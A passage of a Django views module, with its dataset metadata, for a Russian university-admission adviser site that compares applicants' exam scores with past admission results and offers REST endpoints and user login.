final_results[plan.highschool_id]['points']['min1']:\n final_results[plan.highschool_id]['points']['min1'] = plan.min_sum_1\n if plan.min_sum_2 and plan.min_sum_2 < final_results[plan.highschool_id]['points']['min2']:\n final_results[plan.highschool_id]['points']['min2'] = plan.min_sum_2\n\n for a in all_results:\n i = str(a['result_type'])\n if not a['spec_id'] == plan.spec_id or not a['highschool_id'] == plan.highschool_id:\n continue\n spec_points['all' + i] = a['count']\n final_results[plan.highschool_id]['points']['all'+i] += a['count']\n count_good = results.filter(highschool_id=plan.highschool_id, spec_id=plan.spec_id, total__lte=spec_points['user_points'], result_type_id=a['result_type']).count()\n spec_points['good' + i] = count_good\n final_results[plan.highschool_id]['points']['good'+i] += count_good\n # процент для специальности\n if spec_points['all'+i] > 0:\n spec_points['percent'+i] = 100 * spec_points['good'+i] / spec_points['all'+i]\n else:\n spec_points['percent'+i] = 0\n # процент для вуза в целом\n if final_results[plan.highschool_id]['points']['all'+i] > 0:\n final_results[plan.highschool_id]['points']['percent'+i] = 100 * final_results[plan.highschool_id]['points']['good'+i] / final_results[plan.highschool_id]['points']['all'+i]\n else:\n final_results[plan.highschool_id]['points']['percent'+i] = 0\n\n # запоминаем результат\n final_results[plan.highschool_id]['specs'][plan.spec_id] = spec_points\n\n ctx['results'] = final_results\n return render(request, 'highschools_search.html', ctx)\n\n# particular info for one cpec for exact highschool\ndef plan(request, plan_id):\n ctx = {}\n unit = get_user_units(request)\n\n plan = OdcPlan.objects.select_related().get(id=plan_id)\n hs_id = plan.highschool_id\n spec_id = plan.spec_id\n highschool_info = OdcInfoHighschool.objects.get(id=hs_id)\n results = OdcResults.objects.filter(spec_id=spec_id, highschool_id=hs_id,result_type_id__in=(1,2), commercial_type=plan.commercial_type, form=plan.form)\n all_results = results.values('highschool_id', 'result_type', 'spec_id').annotate(count=Count('result_type'))\n bins = OdcResultsBins.objects.filter(highschool_id=hs_id, spec_id=spec_id).values().annotate(count=Count('spec_id'))\n\n sums = bins.values('highschool_id', 'result_type_id').annotate(\n below_150=Sum('below_150'),\n below_160=Sum('below_160'),\n below_170=Sum('below_170'),\n below_180=Sum('below_180'),\n below_190=Sum('below_190'),\n below_200=Sum('below_200'),\n below_210=Sum('below_210'),\n below_220=Sum('below_220'),\n below_230=Sum('below_230'),\n below_240=Sum('below_240'),\n below_250=Sum('below_250'),\n below_260=Sum('below_260'),\n below_270=Sum('below_270'),\n below_280=Sum('below_280'),\n below_290=Sum('below_290'),\n below_300=Sum('below_300'))\n\n ctx = {}\n ctx['highschool'] = highschool_info\n ctx['plan'] = plan\n ctx['sums'] = {}\n for sum in sums:\n ctx['sums'][sum['result_type_id']] = sum\n\n # считаем данные для ВУЗа в целом\n spec_points = {}\n spec_points['all1'] = 0\n spec_points['all2'] = 0\n spec_points['good1'] = 0\n spec_points['good2'] = 0\n spec_points['user_points'] = count_user_points(unit, plan)\n\n for r in all_results:\n spec_points['all' + str(r['result_type'])] = r['count']\n for i in range(1,3):\n count_good = results.filter(total__lte=spec_points['user_points'], result_type_id=i).count()\n spec_points['good'+str(i)] = count_good\n # процент для специальности\n if spec_points['all'+str(i)] > 0:\n spec_points['percent'+str(i)] = 100 * spec_points['good'+str(i)] / spec_points['all'+str(i)]\n else:\n spec_points['percent'+str(i)] = 0\n\n # запоминаем результат\n ctx['specs'] = spec_points\n\n return render(request, 'highschools_spec.html', ctx)\n\n# страница отдельной специальности\ndef spec(request, spec_id):\n ctx = {}\n ctx['spec'] = OdcInfoSpec.objects.select_related().get(id=spec_id)\n\n plans = OdcPlan.objects.select_related().filter(spec_id=spec_id).order_by('-highschool__raiting')\n ctx['highschools'] = []\n for plan in plans:\n hs = None\n for item in ctx['highschools']:\n if item['highschool'].id == plan.highschool_id:\n hs = item\n break\n if hs is None:\n hs = {'highschool': plan.highschool, 'plans': []}\n ctx['highschools'].append(hs)\n hs['plans'].append(plan)\n\n return render(request, 'spec.html', ctx)\n\n# все специальности по группам на одном страничке\ndef specs(request):\n ctx = {}\n ctx['groups'] = {}\n specs = OdcInfoSpec.objects.select_related().all()\n for spec in specs:\n ctx['groups'].setdefault(spec.group.id, {'group': spec.group, 'specs': []})\n ctx['groups'][spec.group.id]['specs'].append(spec)\n return render(request, 'specialities.html', ctx)\n\n# рейтинг топ-100 ВУЗов\ndef rating(request):\n ctx = {}\n ctx['highschools'] = OdcInfoHighschool.objects.order_by('-raiting')[:100]\n return render(request, 'rating.html', ctx)\n\n# добавление/удаление в избранное\n@login_required\ndef add_highschool(request):\n fav = request.user.user_info.getfavhs()\n id = int(request.GET['id'])\n if id in fav:\n fav.remove(id)\n else:\n fav.append(id)\n request.user.user_info.setfavhs(fav)\n request.user.user_info.save()\n return HttpResponse('ok')\n\n# добавление/удаление в избранное\n@login_required\ndef add_plan(request):\n fav = request.user.user_info.getfavpl()\n id = int(request.GET['id'])\n if id in fav:\n fav.remove(id)\n else:\n fav.append(id)\n request.user.user_info.setfavpl(fav)\n request.user.user_info.save()\n return HttpResponse('ok')\n\n# страница избранного\n@require_login(url='core.views.signup')\ndef favourites(request):\n ctx = {}\n\n highschools = {}\n hs_ids = request.user.user_info.getfavhs()\n all_hs = OdcInfoHighschool.objects.filter(id__in=hs_ids).order_by('-raiting')\n\n unit = get_user_units(request)\n highschools = []\n\n for hs in all_hs:\n plans = OdcPlan.objects.filter(highschool_id=hs.id)\n results = OdcResults.objects.filter(highschool_id=hs)\n\n from django.db.models import Min, Sum\n highschool = {}\n highschool['highschool'] = hs\n highschool['all1'] = results.filter(result_type_id=1).count()\n highschool['all2'] = results.filter(result_type_id=2).count()\n highschool['good1'] = 0\n highschool['good2'] = 0\n highschool['min1'] = plans.aggregate(Min('min_sum_1'))['min_sum_1__min']\n highschool['min2'] = plans.aggregate(Min('min_sum_2'))['min_sum_2__min']\n highschool['planned'] = plans.aggregate(Sum('planned'))['planned__sum']\n\n for plan in plans:\n user_points = count_user_points(unit, plan)\n\n for i in range(1,3):\n highschool['good' + str(i)] += results.filter(spec_id=plan.spec_id, result_type_id=i, total__lte=user_points, commercial_type=plan.commercial_type_id, form=plan.form).count()\n\n # процент для вуза в целом\n for i in range(1,3):\n if highschool['all'+str(i)] > 0:\n highschool['percent'+str(i)] = 100 * highschool['good'+str(i)] / highschool['all'+str(i)]\n else:\n highschool['percent'+str(i)] = 0\n\n # запоминаем результат\n highschools.append(highschool)\n ctx['highschools'] = highschools\n\n pl_ids = request.user.user_info.getfavpl()\n plans = []\n for pl_id in pl_ids:\n pl = OdcPlan.objects.select_related().get(id=pl_id)\n results = OdcResults.objects.filter(highschool_id=pl.highschool_id, spec_id=pl.spec_id)\n\n plan = {}\n plan['plan'] = pl\n plan['all1'] = 0\n plan['all2'] = 0\n plan['good1'] = 0\n plan['good2'] = 0\n plan['user_points'] = count_user_points(unit, pl)\n\n for i in range(1,3):\n plan['all' + str(i)] = results.filter(result_type_id=i).count()\n plan['good'+str(i)] = results.filter(total__lte=plan['user_points'], result_type_id=i).count()\n # процент для специальности\n if plan['all'+str(i)] > 0:\n plan['percent'+str(i)] = 100 * plan['good'+str(i)] / plan['all'+str(i)]\n else:\n plan['percent'+str(i)] = 0\n\n # запоминаем результат\n plans.append(plan)\n ctx['plans'] = plans\n\n return render(request, 'favourites.html', ctx)\n\n# функция под внутренние нужды\n@login_required\ndef debug(request):\n ctx = {}\n return HttpResponse('ok')\n\n # считаем, что количество мест равно суммарному числу поступивших в первую и вторую волну\n # plans = OdcPlan.objects.all()\n # for plan in plans:\n # res = OdcResults.objects.filter(spec_id=plan.spec_id, highschool_id=plan.highschool_id, result_type_id__in=(1,2), commercial_type=plan.commercial_type_id, form=plan.form).count()\n # plan.planned = res\n # plan.save()\n\n # очищаем, а затем заполняем новыми данными рейтинги вузов\n # points = {161:4.179, 165:4.151, 147:4.056, 901:4.038, 296:3.922, 313:3.749, 294:3.510, 1507:3.499, 219:3.426, 59:3.425, 1519:3.419, 177:3.289, 222:3.237, 234:3.074, 209:3.068, 247:2.812, 251:2.774, 131:2.734, 337:2.726, 170:2.511, 212:2.481, 295:2.420, 130:2.388, 1520:2.378, 45:2.364, 301:2.307, 213:2.301, 148:2.274, 223:2.272, 310:2.265, 319:2.171, 336:2.164, 60:2.117, 199:2.101, 197:2.093, 252:2.086, 4:2.049, 1527:2.037, 129:2.028, 144:2.008, 16:2.005, 132:1.965, 253:1.960, 127:1.897, 169:1.889, 3:1.887, 79:1.887, 236:1.872, 36:1.868, 17:1.841, 160:1.791, 258:1.787, 243:1.762, 271:1.746, 217:1.739, 293:1.735, 183:1.725, 302:1.718, 113:1.684, 242:1.641, 1544:1.618, 85:1.609, 108:1.606}\n # highschools = OdcInfoHighschool.objects.all()\n # for hs in highschools:\n # hs.raiting = None\n # hs.save()\n # highschools = OdcInfoHighschool.objects.filter(id__in = points.keys())\n # for hs in highschools:\n # hs.raiting = points[hs.id]\n # hs.save()\n\n # ctx['test'] = [str(hs.id) + '|' + hs.website for hs in OdcInfoHighschool.objects.all()]\n\n return render(request, 'highschools_search.html', ctx)\n\n\n# rest api\n\n# highschools\n\nclass HighSchoolsViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoHighschool.objects.all()\n serializer_class = HighSchoolSerializer\n\nclass HighSchoolsWithResultsViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoHighschool.objects.all().prefetch_related('results')\n serializer_class = HighSchoolWithResultsSerializer\n\nclass HighSchoolsWithResultsBySpecView(generics.ListAPIView):\n serializer_class = ShortOdcResultsSerializer\n pagination_class = None\n\n def get_queryset(self):\n highschool_id = self.kwargs['highschool_id']\n spec_id = self.kwargs['spec_id']\n queryset = OdcResults.objects.filter(highschool_id=highschool_id, spec_id=spec_id).select_related()\n return queryset\n\n def list(self, request, *args, **kwargs):\n self.object_list = self.filter_queryset(self.get_queryset())\n serializer = self.get_serializer(self.object_list, many=True)\n results = {}\n for item in serializer.data:\n if not item['result_type'] in results.keys():\n results[item['result_type']] = []\n results[item['result_type']].append(item['total'])\n return Response({'results': results})\n\n\n# specs and groups\n\nclass SpecViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoSpec.objects.all()\n serializer_class = SpecSerializer\n pagination_class = None\n\nclass SpecGroupViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoSpecGroup.objects.all().prefetch_related('specs')\n serializer_class = SpecGroupSerializer\n pagination_class = None\n\nclass GroupViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcInfoSpecGroup.objects.all()\n serializer_class = GroupSerializer\n pagination_class = None\n\n\n# results\n\nclass OdcResultsViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcResults.objects.all()\n serializer_class = OdcResultsSerializer\n\nclass OdcResultsBySpecViewSet(generics.ListAPIView):\n queryset = OdcResults.objects.all()\n serializer_class = OdcResultsSerializer\n\n def get_queryset(self):\n spec_id = self.kwargs['spec_id']\n queryset = OdcResults.objects.all(spec_id=spec_id)\n return queryset\n\n\n# others\n\nclass PlanSet(viewsets.ReadOnlyModelViewSet):\n queryset = OdcPlan.objects.all()\n serializer_class = PlanSerializer\n\nclass PlansByGroupList(generics.ListAPIView):\n serializer_class = PlanSerializer\n\n def get_queryset(self):\n group_id = self.kwargs['group_id']\n group_set = OdcInfoSpec.objects.filter(group_id=group_id).values_list('id', flat=True)\n return OdcPlan.objects.filter(spec_id__in=group_set)\n\nclass PlansBySpecList(generics.ListAPIView):\n serializer_class = PlanSerializer\n\n def get_queryset(self):\n spec_id = self.kwargs['spec_id']\n return OdcPlan.objects.filter(spec_id=spec_id)\n\n\n# searches\n\nclass SearchList(generics.ListAPIView):\n queryset = OdcResults.objects.all()\n serializer_class = SearchResultSerializer\n\n def get_queryset(self):\n summ = self.request.query_params['sum']\n spec_id = self.kwargs['spec_id']\n query = OdcResults.objects.all()\n query = query.filter(form_id=1, commercial_type_id=1, spec_id=spec_id)\n query = query.filter(result_type_id__in=(1,2))\n return query\n\nclass SearchList1(generics.ListAPIView):\n queryset = OdcPlan.objects.all()\n serializer_class = SearchResultSerializer\n\n def get_queryset(self):\n spec_id = self.kwargs['spec_id']\n query = OdcPlan.objects.all()\n query = query.filter(form_id=1, commercial_type_id=1, spec_id=spec_id)\n query = query.filter(result_type_id=1)\n return query\n\nclass Search1(generics.ListAPIView):\n queryset = OdcResultsBins.objects.all()\n serializer_class = OdcResultsBinsSerializer\n\n def list(self, request, *args, **kwargs):\n query = self.queryset\n specs = None\n if self.request.query_params.get('specs') is not None:\n specs = self.request.query_params.get('specs').split(',')\n query = self.queryset.filter(spec_id__in=specs).values().annotate(count=Count('spec_id'))\n hs = query.values('highschool_id').annotate(count=Count('highschool_id')).values_list('highschool_id', flat=True)\n highschools = OdcInfoHighschool.objects.filter(id__in=hs).values('name', 'raiting', 'id', 'website')\n query = query.values('highschool_id', 'result_type_id').annotate(\n below_150=Sum('below_150'),\n below_160=Sum('below_160'),\n below_170=Sum('below_170'),\n below_180=Sum('below_180'),\n below_190=Sum('below_190'),\n below_200=Sum('below_200'),\n below_210=Sum('below_210'),\n below_220=Sum('below_220'),\n below_230=Sum('below_230'),\n below_240=Sum('below_240'),\n below_250=Sum('below_250'),\n below_260=Sum('below_260'),\n below_270=Sum('below_270'),\n below_280=Sum('below_280'),\n below_290=Sum('below_290'),\n below_300=Sum('below_300'))\n all_results = []\n for item in highschools:\n all_results.append(item)\n for item in query:\n for result in all_results:\n if result['id'] == item['highschool_id']:\n result[item['result_type_id']] = item\n\n russian = get_int_param(self.request, 'russian')\n math = get_int_param(self.request, 'math')\n physics = get_int_param(self.request, 'physics')\n chemistry = get_int_param(self.request, 'chemistry')\n informatics = get_int_param(self.request, 'informatics')\n biology = get_int_param(self.request, 'biology')\n history = get_int_param(self.request, 'history')\n geography = get_int_param(self.request, 'geography')\n foreign_language = get_int_param(self.request, 'foreign_language')\n social_science = get_int_param(self.request, 'social_science')\n literature = get_int_param(self.request, 'literature')\n\n if specs is None:\n plans = OdcPlan.objects.filter(commercial_type='1', form='1')\n else:\n plans = OdcPlan.objects.filter(spec_id__in=specs, commercial_type='1', form='1')\n user_points = {}\n highschools = []\n for plan in plans:\n points = russian*plan.russian + math*plan.math + physics*plan.physics + \\\n chemistry*plan.chemistry + informatics*plan.informatics + \\\n biology*plan.biology + history*plan.history + geography*plan.geography + \\\n foreign_language*plan.foreign_language + social_science*plan.social_science + \\\n literature*plan.literature\n if plan.highschool_id not in user_points.keys():\n user_points[plan.highschool_id] = {}\n user_points[plan.highschool_id]['user_points'] = points\n user_points[plan.highschool_id]['all1'] = 0\n user_points[plan.highschool_id]['all2'] = 0\n user_points[plan.highschool_id]['good1'] = 0\n user_points[plan.highschool_id]['good2'] = 0\n highschools = user_points.keys()\n\n if specs is None:\n results = OdcResults.objects.filter(highschool_id__in=highschools,result_type_id__in=(1,2), commercial_type='1', form='1')\n else:\n results = OdcResults.objects.filter(spec_id__in=specs, highschool_id__in=highschools,result_type_id__in=(1,2), commercial_type='1', form='1')\n all_students = results.values('highschool_id', 'result_type').annotate(count=Count('result_type'))\n\n for a in all_students:\n user_points[a['highschool_id']]['all' + str(a['result_type'])] = a['count']\n for a in all_students:\n for i in range(1,3):\n all_students = results.filter(highschool_id=a['highschool_id'], total__lte=user_points[a['highschool_id']]['user_points'], result_type_id=i).values_list('total')\n user_points[a['highschool_id']]['good'+str(i)] = len(all_students)\n if user_points[a['highschool_id']]['all'+str(i)] > 0:\n user_points[a['highschool_id']]['percent'+str(i)] = 100 * user_points[a['highschool_id']]['good'+str(i)] / user_points[a['highschool_id']]['all'+str(i)]\n else:\n user_points[a['highschool_id']]['percent'+str(i)] = 0\n\n for a in all_results:\n a['points'] = {}\n if a['id'] in user_points.keys():\n a['points'] = user_points[a['id']]\n\n return Response({'results': all_results})\n\nclass Search2(generics.ListAPIView):\n queryset = OdcResultsBins.objects.all()\n serializer_class = OdcResultsBinsSerializer\n\n def list(self, request, *args, **kwargs):\n query = self.queryset\n\n specs = None\n if self.request.query_params.get('specs') is not None:\n specs = self.request.query_params.get('specs').split(',')\n query = self.queryset.filter(spec_id__in=specs)\n\n highschool_id = self.kwargs['highschool']\n highschools = OdcInfoHighschool.objects.filter(id=highschool_id).values()\n\n query = query.filter(highschool_id=highschool_id).values('spec_id', 'result_type').annotate(\n below_150=Sum('below_150'),\n below_160=Sum('below_160'),\n below_170=Sum('below_170'),\n below_180=Sum('below_180'),\n below_190=Sum('below_190'),\n below_200=Sum('below_200'),\n below_210=Sum('below_210'),\n below_220=Sum('below_220'),\n below_230=Sum('below_230'),\n below_240=Sum('below_240'),\n below_250=Sum('below_250'),\n below_260=Sum('below_260'),\n below_270=Sum('below_270'),\n below_280=Sum('below_280'),\n below_290=Sum('below_290'),\n below_300=Sum('below_300'))\n all_results = []\n for item in highschools:\n item['specs'] = {}\n for q in query:\n item['specs'][q['spec_id']] = {}\n all_results.append(item)\n for item in highschools:\n for q in query:\n item['specs'][q['spec_id']][q['result_type']] = q\n # if result['id'] == item['highschool_id']:\n # result[item['result_type_id']] = item\n\n russian = get_int_param(self.request, 'russian')\n math = get_int_param(self.request, 'math')\n physics = get_int_param(self.request, 'physics')\n chemistry = get_int_param(self.request, 'chemistry')\n informatics = get_int_param(self.request, 'informatics')\n biology = get_int_param(self.request, 'biology')\n history = get_int_param(self.request, 'history')\n geography = get_int_param(self.request, 'geography')\n foreign_language = get_int_param(self.request, 'foreign_language')\n social_science = get_int_param(self.request, 'social_science')\n literature = get_int_param(self.request, 'literature')\n\n if specs is None:\n plans = OdcPlan.objects.filter(highschool_id=highschool_id, commercial_type='1', form='1')\n else:\n plans = OdcPlan.objects.filter(highschool_id=highschool_id, spec_id__in=specs, commercial_type='1', form='1')\n user_points = {}\n user_points['highschool'] = highschools\n user_points['specs'] = {}\n for plan in plans:\n points = russian*plan.russian + math*plan.math + physics*plan.physics + \\\n chemistry*plan.chemistry + informatics*plan.informatics + \\\n biology*plan.biology + history*plan.history + geography*plan.geography + \\\n foreign_language*plan.foreign_language + social_science*plan.social_science + \\\n literature*plan.literature\n if plan.spec_id not in user_points.keys():\n user_points['specs'][plan.spec_id] = {}\n user_points['specs'][plan.spec_id] = {}\n user_points['specs'][plan.spec_id]['user_points'] = points\n user_points['specs'][plan.spec_id]['all1'] = 0\n user_points['specs'][plan.spec_id]['all2'] = 0\n user_points['specs'][plan.spec_id]['good1'] = 0\n user_points['specs'][plan.spec_id]['good2'] = 0\n\n if specs is None:\n results = OdcResults.objects.filter(highschool_id=highschool_id,result_type_id__in=(1,2), commercial_type='1', form='1')\n else:\n results = OdcResults.objects.filter(spec_id__in=specs, highschool_id=highschool_id,result_type_id__in=(1,2), commercial_type='1', form='1')\n all_students = results.values('highschool_id', 'spec_id', 'result_type').annotate(count=Count('result_type'))\n for a in all_students:\n user_points['specs'][a['spec_id']]['all' + str(a['result_type'])] = a['count']\n for a in all_students:\n for i in range(1,3):\n all_students = results.filter(highschool_id=highschool_id,\n spec_id=a['spec_id'],\n total__lte=user_points['specs'][a['spec_id']]['user_points'],\n result_type_id=i).values_list('total')\n user_points['specs'][a['spec_id']]['good'+str(i)] = len(all_students)\n if user_points['specs'][a['spec_id']]['all'+str(i)] > 0:\n user_points['specs'][a['spec_id']]['percent'+str(i)] = 100 * user_points['specs'][a['spec_id']]['good'+str(i)] / user_points['specs'][a['spec_id']]['all'+str(i)]\n else:\n user_points['specs'][a['spec_id']]['percent'+str(i)] = 0\n\n for a in all_results[0]['specs'].keys():\n spec = all_results[0]['specs'][a]\n spec['points'] = {}\n if a in user_points['specs'].keys():\n spec['points'] = user_points['specs'][a]\n\n return Response({'results': all_results})\n\ndef login(request):\n ctx = {}\n from .forms import RegistrationForm\n ctx['form'] = RegistrationForm\n return render(request, 'login.html', ctx)\n\n@unauthenticated_only(url='core.views.index')\ndef signup(request):\n ctx = {}\n from .forms import RegistrationForm\n ctx['form'] = RegistrationForm\n return render(request, 'signup.html', ctx)\n\n@require_post(url='core.views.index')\n@unauthenticated_only(url='core.views.index')\ndef do_login(request):\n username = request.POST['email']\n password = request.POST['password']\n from django.contrib.auth import authenticate, login\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n put_user_info_into_session(request)\n return redirect('core.views.index')\n else:\n return redirect(reverse('core.views.login') + '?error=inactive')\n else:\n return redirect(reverse('core.views.login') + '?error=incorrect')\n\n@require_post(url='core.views.index')\n@unauthenticated_only(url='core.views.index')\ndef do_register(request):\n ctx = {}\n email = request.POST['email']\n password = request.POST['password']\n if not email or not password:\n return redirect(reverse('core.views.signup') + '?error=fields_empty')\n if len(password) < 6:\n return redirect(reverse('core.views.signup') + '?error=password_short')\n try:\n User.objects.get(email = email)\n return redirect(reverse('core.views.signup') + '?error=email_used')\n except:\n user = User.objects.create_user(email, email, password)\n user.user_info = UserInfo(user=user)\n user.user_info.save()\n user.is_active = True\n user.save()\n from django.contrib.auth import authenticate, login\n user = authenticate(username=email, password=password)\n login(request, user)\n ctx.update({'response': 'success', 'message': u'You are successfully registered you user'})\n return redirect('core.views.index')\n\n@require_login(url='core.views.index')\ndef do_logout(request):\n from django.contrib.auth import logout\n logout(request)\n return redirect('core.views.index')", "repo_name": "bshishov/ODC.HighSchoolAdviser.Backend", "sub_path": "HighSchoolAdviser/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 32261, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.OdcInfoHighschool.objects.get", "line_number": 26, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 26, "usage_type": "name"}, {"api_name": "models.OdcPlanType.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.OdcPlanType.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.OdcPlanType", "line_number": 27, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 37, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 37, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 56, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 79, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 79, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 81, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 81, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 82, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 83, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 85, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 85, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 87, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 87, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 88, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 153, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 153, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 156, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 157, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 158, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects.filter", "line_number": 159, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "models.OdcResultsBins", "line_number": 159, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 159, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 163, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 164, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 165, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 166, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 167, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 168, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 169, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 170, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 171, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 172, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 173, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 174, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 175, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 176, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 177, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects.select_related", "line_number": 213, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 213, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 215, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 215, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 215, "usage_type": "name"}, {"api_name": "models.OdcInfoSpec.objects.select_related", "line_number": 234, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 234, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 234, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.order_by", "line_number": 243, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 243, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 243, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 257, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 247, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 270, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 260, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 279, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 279, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 279, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 285, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 285, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 285, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 286, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 286, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 286, "usage_type": "name"}, {"api_name": "django.db.models.Min", "line_number": 295, "usage_type": "call"}, {"api_name": "django.db.models.Min", "line_number": 296, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 297, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 319, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 319, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 319, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 320, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 320, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 320, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 349, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 346, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 378, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 378, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.all", "line_number": 379, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 379, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 379, "usage_type": "name"}, {"api_name": "serializers.HighSchoolSerializer", "line_number": 380, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 382, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 382, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.all", "line_number": 383, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 